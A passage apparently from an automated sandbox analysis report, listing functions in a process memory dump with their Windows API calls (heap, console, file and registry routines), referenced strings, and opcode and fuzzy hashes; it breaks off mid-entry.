                                              • Opcode ID: 2e036d23be626e16499c3a81bf7882bba9c6c427fd7719e307be73846b8bc5f7
                                              • Instruction ID: e04d6990c4b8150fe1d8de4bc6579d7a2e5619e8cf46721dcc7040a179c489d7
                                              • Opcode Fuzzy Hash: 2e036d23be626e16499c3a81bf7882bba9c6c427fd7719e307be73846b8bc5f7
                                              • Instruction Fuzzy Hash: 67113071A101596BDB21DEA5EC8AFBFBBB8EB44344F04016DA605D3141DB34DE54CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C916C, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002C9185
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002C8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 002C918D
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 002C91A4
                                              • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 002C91D1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                              • String ID:
                                              • API String ID: 2448200120-0
                                              • Opcode ID: 9e29f6a4d5908703d2c27ac66ff4fbca66d760aa9dca0a97f2031a7e6a3a0851
                                              • Instruction ID: a764a0d5168f3d04b10dd75d05dc9392eceb1115a8eccede914b8c04b98813c8
                                              • Opcode Fuzzy Hash: 9e29f6a4d5908703d2c27ac66ff4fbca66d760aa9dca0a97f2031a7e6a3a0851
                                              • Instruction Fuzzy Hash: 33110831660116ABDB259F55FC8EF7E7758EB80751F14421EF80587150DFB09DA0CAA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AAC30, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 002AAC8E
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002AAC95
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 002AACBE
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002AACC5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 7d3992e39f400b18b0c93ac984ec44eaba28e2da8720930988650a4f38af490a
                                              • Instruction ID: c80e41a0e1e3ea3cc8491a1ce381fe201830cda252389c95a3cdaf85b64d1e82
                                              • Opcode Fuzzy Hash: 7d3992e39f400b18b0c93ac984ec44eaba28e2da8720930988650a4f38af490a
                                              • Instruction Fuzzy Hash: 19110B312102919BDB20DF69A88D7B63BA6EF46321F24045FF48BCF252CF20C861DB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B5D59, Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 002B5D9D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B5DA4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: fc228f2117b3489c158a9fa0fd1d0da22b7a837c4b820a1c62df8224177449d0
                                              • Instruction ID: 29bc006e0f802a672fdfd093346a766fb646d8f8978c43a9416b429f8de71622
                                              • Opcode Fuzzy Hash: fc228f2117b3489c158a9fa0fd1d0da22b7a837c4b820a1c62df8224177449d0
                                              • Instruction Fuzzy Hash: 1111883137497353CA24EF15A86CBFF2355DF85B81B59029AE80B5F380CB608C629A90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B0100, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,002AEBC3), ref: 002B0117
                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B011E
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 002B0133
                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B013A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Process$AllocSize
                                              • String ID:
                                              • API String ID: 2549470565-0
                                              • Opcode ID: 92e4f8a5ffad7f0455f5cbfa475f94d866490f008ef03f17d67e5b0cdc49fc54
                                              • Instruction ID: 5743acad68b8c4ef422d7414d5aecae83d6140bef114039b2b9004449cc8ab60
                                              • Opcode Fuzzy Hash: 92e4f8a5ffad7f0455f5cbfa475f94d866490f008ef03f17d67e5b0cdc49fc54
                                              • Instruction Fuzzy Hash: 7401C0B22602439BC7169B59ECCCFDB7768EB947A2F244021E50EDA060DB30D8648B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C7DF1, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,002BE18E), ref: 002C7E19
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,002BE18E), ref: 002C7E26
                                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,002BE18E), ref: 002C7E4A
                                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,002BE18E), ref: 002C7E52
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                              • String ID:
                                              • API String ID: 1033415088-0
                                              • Opcode ID: 012a1d5b4e0b5b0b7de997747d371dfe822a8e6ff7a48119b75a3b973aab2ec1
                                              • Instruction ID: 20bbdf909f7fbad9fc51f787b2eed2fb6d8bf7b3117d61687b34b3658261792b
                                              • Opcode Fuzzy Hash: 012a1d5b4e0b5b0b7de997747d371dfe822a8e6ff7a48119b75a3b973aab2ec1
                                              • Instruction Fuzzy Hash: C8019272A24119AF8B009FB4AC88EFFB7FCEB0D351B00026AF806D6140EA249D5186A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6D00, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                              • String ID:
                                              • API String ID: 1063105408-0
                                              • Opcode ID: 94f4803a6bdd4d53f8e99eb507ffb56568e093f25128a655da45557c346e9c91
                                              • Instruction ID: 2d2f9c7006849d4ccaa3561a51ca55014fd450a92e6f4ca3dc0384571087f7f8
                                              • Opcode Fuzzy Hash: 94f4803a6bdd4d53f8e99eb507ffb56568e093f25128a655da45557c346e9c91
                                              • Instruction Fuzzy Hash: C3115270A24302CFC7349F30F88CAA537A1F746395F24496ED4158A2E1DB7A89A1DF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A43A0, Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B22C0: wcschr.MSVCRT ref: 002B22CC
                                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 002A43D5
                                              • _open_osfhandle.MSVCRT ref: 002A43E9
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 002A4401
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002B838D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                              • String ID:
                                              • API String ID: 22757656-0
                                              • Opcode ID: d4fa88f3894a63b89ac3c349e7da792ee5663d6d10c566d7bf32dde0b6ecdfeb
                                              • Instruction ID: 9e9e28592c3bff96d3f02a18737253883eaaf0ffcdf90b9033d2310637e3c777
                                              • Opcode Fuzzy Hash: d4fa88f3894a63b89ac3c349e7da792ee5663d6d10c566d7bf32dde0b6ecdfeb
                                              • Instruction Fuzzy Hash: AA01F771850120ABD7146B68BC4DB9D7BA8AB85735F20034AF834EB2D0DFF058558790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C1914, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,002C1735), ref: 002C1932
                                              • RtlFreeHeap.NTDLL(00000000,?,?), ref: 002C1939
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,002C1735), ref: 002C1957
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C195E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 97667b56a5077fffe2fe91ce8e2722f6e4d3ea4a074bbf491af3b5eb656de732
                                              • Instruction ID: 3707e4e2dee024bfbc9a21ac762f7b5a184f1486f41e8bcebabd61d5fd2dcccf
                                              • Opcode Fuzzy Hash: 97667b56a5077fffe2fe91ce8e2722f6e4d3ea4a074bbf491af3b5eb656de732
                                              • Instruction Fuzzy Hash: F4F06272650202AFDB149FA0EC8DBA5B7F8FF48316F11092EE549CA440D774E8A5CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B3B2C, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,002B3DBB), ref: 002B3B33
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002B3DBB), ref: 002B3B3A
                                                • Part of subcall function 002B3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,002B3A9F), ref: 002B3AB2
                                                • Part of subcall function 002B3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 002B3ACD
                                                • Part of subcall function 002B3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B3AD4
                                                • Part of subcall function 002B3AAE: memcpy.MSVCRT ref: 002B3AE3
                                                • Part of subcall function 002B3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 002B3AEC
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,002B3DBB), ref: 002BDFEA
                                              • RtlFreeHeap.NTDLL(00000000,?,002B3DBB), ref: 002BDFF1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                              • String ID:
                                              • API String ID: 197374240-0
                                              • Opcode ID: be6e5a8eb3d13eae47eb6ee81003d14c9baf998aef1abe0e5e66a7ebb799924d
                                              • Instruction ID: f6b21621de80a740380cddd628ab97d5631661f69502b2c44941e36385fb40e8
                                              • Opcode Fuzzy Hash: be6e5a8eb3d13eae47eb6ee81003d14c9baf998aef1abe0e5e66a7ebb799924d
                                              • Instruction Fuzzy Hash: 9AE0483369425367DA307BF97C0EFC62A54DB45761F114456F78DDD1C0DD60C9808B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C9897, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002C98A3
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,002C3811,?,?,00000001,?), ref: 002C98AB
                                              • _get_osfhandle.MSVCRT ref: 002C98C1
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002C3811,?,?,00000001,?), ref: 002C98C9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID:
                                              • API String ID: 1606018815-0
                                              • Opcode ID: b58ed11abb5dd3d0a12b020e3481ca9be5b57ceb36b590638ed413a939ee9df3
                                              • Instruction ID: d24c7654ad8bdbd60f6e620c9f40c63917d8616e001651527cbca1baefd6ef84
                                              • Opcode Fuzzy Hash: b58ed11abb5dd3d0a12b020e3481ca9be5b57ceb36b590638ed413a939ee9df3
                                              • Instruction Fuzzy Hash: E7E01271940645ABDB109BA1EC4DFE9776CEB00311F140686F915CA1D1DA719A90DA70
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B4C00, Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B4C19
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B4C21
                                              • _get_osfhandle.MSVCRT ref: 002B4C2F
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B4C37
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID:
                                              • API String ID: 1606018815-0
                                              • Opcode ID: 1589b406b239b8baa2790603417db905d6619d84dafff61273c2fa8a44a496f6
                                              • Instruction ID: ccf253d2373d80eb04a0ece200a791f7add8c5f430c8f2bea57080851e5c6df7
                                              • Opcode Fuzzy Hash: 1589b406b239b8baa2790603417db905d6619d84dafff61273c2fa8a44a496f6
                                              • Instruction Fuzzy Hash: 1EE026B2941640EFDB08DBA0FD4DB557BB5F708301B14495BF511CB1A1DB759A80EB21
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AACD5, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,002AACAB), ref: 002AACDE
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002AACE5
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 002AACEE
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002AACF5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 5e8b0ce210f215e5aef1f76117419cef7c30cfa9838e60ae5315397510e13f0a
                                              • Instruction ID: 78693a87ae25d1934cfd1c88df43c70b85085813c35808cd6752e9ae5e8f4985
                                              • Opcode Fuzzy Hash: 5e8b0ce210f215e5aef1f76117419cef7c30cfa9838e60ae5315397510e13f0a
                                              • Instruction Fuzzy Hash: D2D0C932484191ABDF503BE0BC4DFC63E28EF4D322F020453F64D8E0608AB088C09F60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A9429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                                • Part of subcall function 002AD7D4: wcschr.MSVCRT ref: 002AD7DA
                                                • Part of subcall function 002AEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,002AE5F6,?,00000000,00000000,00000000), ref: 002AEF39
                                                • Part of subcall function 002AEEF0: RtlFreeHeap.NTDLL(00000000,?,002AE5F6), ref: 002AEF40
                                                • Part of subcall function 002AEEF0: _setjmp3.MSVCRT ref: 002AEFA5
                                              • _wcsupr.MSVCRT ref: 002C0A16
                                                • Part of subcall function 002B2ABE: memset.MSVCRT ref: 002B2B59
                                                • Part of subcall function 002B2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 002B2C13
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                              • String ID: FOR$ IF
                                              • API String ID: 3818062306-2924197646
                                              • Opcode ID: bd1251aa36d2fd091752dfb8958fd9d928fd01b0842dbb28ca0ec791e480fd25
                                              • Instruction ID: 94fdf4232a149d2feeead6c4976889b1e9180ebdb0bacc45e5cdb9dc88b86268
                                              • Opcode Fuzzy Hash: bd1251aa36d2fd091752dfb8958fd9d928fd01b0842dbb28ca0ec791e480fd25
                                              • Instruction Fuzzy Hash: DB515B31730303DBDB256F299891B7B6292EF95754B64022DEA06CB291FF71DDA1C780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CB2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • wcschr.MSVCRT ref: 002CB377
                                              • memcpy.MSVCRT ref: 002CB3F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$AllocProcessmemcpywcschr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 3241892172-381716982
                                              • Opcode ID: 44634e7e7ba5018d191484aabab00a54959ccb8d67c76efc98e8fa892cbda0bd
                                              • Instruction ID: f15e6350adfb2223e019c789fb92b88bba64f77673c18296324aaf4326a27bd1
                                              • Opcode Fuzzy Hash: 44634e7e7ba5018d191484aabab00a54959ccb8d67c76efc98e8fa892cbda0bd
                                              • Instruction Fuzzy Hash: B9619C70E24215CBCB29CF68E892AADB7F1BF48340F25426EE815E7251DB709D51CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002ADE4F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcsicmp.MSVCRT ref: 002ADE60
                                                • Part of subcall function 002AF300: _setjmp3.MSVCRT ref: 002AF318
                                                • Part of subcall function 002AF300: iswspace.MSVCRT ref: 002AF35B
                                                • Part of subcall function 002AF300: wcschr.MSVCRT ref: 002AF37D
                                                • Part of subcall function 002AF300: iswdigit.MSVCRT ref: 002AF3DE
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • longjmp.MSVCRT(002DB8B8,00000001,00000000), ref: 002BBCF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
                                              • String ID: REM/?
                                              • API String ID: 1631155197-4093888634
                                              • Opcode ID: d5f4145517112660aea997eaa0a7bc8f7f5e6a87c13d8922df80bb5832068374
                                              • Instruction ID: 7275bb27ff794c4a46657405bd9fa5771be3b31674299215bafad43038fd7adf
                                              • Opcode Fuzzy Hash: d5f4145517112660aea997eaa0a7bc8f7f5e6a87c13d8922df80bb5832068374
                                              • Instruction Fuzzy Hash: A02125327743419BE7A4AB35AE4AB2723909F82750F10443BE507CAAD1EEB4CC218B09
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C4A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,002CC120,0000001C,002C5CB1), ref: 002C4A58
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 002C4B28
                                                • Part of subcall function 002C587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C58AF
                                                • Part of subcall function 002C587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,002CC0E0), ref: 002C58E5
                                                • Part of subcall function 002C587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C58F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$Close$CreateOpenValueiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 1047774138-1656466771
                                              • Opcode ID: 9f83bf575705325b53ce8057ca828d8247560052440a129f6caa27c600f7f826
                                              • Instruction ID: 016d3976057c9767d4856e22edf26b59cfe729905afefc76a784bedc0ff4d77d
                                              • Opcode Fuzzy Hash: 9f83bf575705325b53ce8057ca828d8247560052440a129f6caa27c600f7f826
                                              • Instruction Fuzzy Hash: AD317571E642159BCF08FFB59861FAEB6B1AF49740B14411DE402BB291EE705D208F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C51C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,002CC0C0,0000001C,002C5CE1), ref: 002C51F4
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 002C52BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$CloseOpeniswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2439148603-1656466771
                                              • Opcode ID: 76ea2ba382cfe7179aa2e98a0e9d320218ff1e9eb93897b1f7b3656d95d45ae8
                                              • Instruction ID: 01b96053a11cd200081b80252402db6161ec653e6ad541e06e9429f7fb3e2f68
                                              • Opcode Fuzzy Hash: 76ea2ba382cfe7179aa2e98a0e9d320218ff1e9eb93897b1f7b3656d95d45ae8
                                              • Instruction Fuzzy Hash: E021B631E34615CBDF18AFB48851FAD76F1AF89700B20421DF802BB295EE709D508F51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,002B0B7F), ref: 002BCDDF
